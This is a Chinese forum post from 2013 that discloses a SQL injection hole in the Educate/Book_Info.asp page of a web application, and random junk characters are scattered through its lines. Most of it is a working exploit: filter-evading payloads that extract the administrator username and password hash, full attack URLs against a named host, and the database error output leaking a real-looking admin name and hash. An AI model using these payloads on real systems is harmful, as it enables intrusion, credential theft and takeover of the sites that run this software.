漏洞出现在Educate/Book_Info.asp
1 W/ O4 B1 h6 G) r此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
3 l" V; a2 L2 `% p. w& @exp:如下
. o- A8 Z8 @( m6 ~' U; P+ \9 w查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)- C2 g, Y" X8 Z6 b6 `
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper): }: Z1 ]9 }7 @/ }- W4 j) ?9 V
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)3 n) h4 N7 ^+ Z. h* N3 o7 _- o2 \: n
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
^2 X3 M# c- V, J' \( I将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。. [! t9 @) @3 y; i& L; L: Q& H
/Educate/Book_Info.asp,行 84 V# k7 M- \1 R. p' Y4 g8 z
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)% B _3 o8 r" c# f; }
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
- c. _7 t% Y9 u& R* S% M将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。) v3 q6 p9 H* A
/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
支持
反对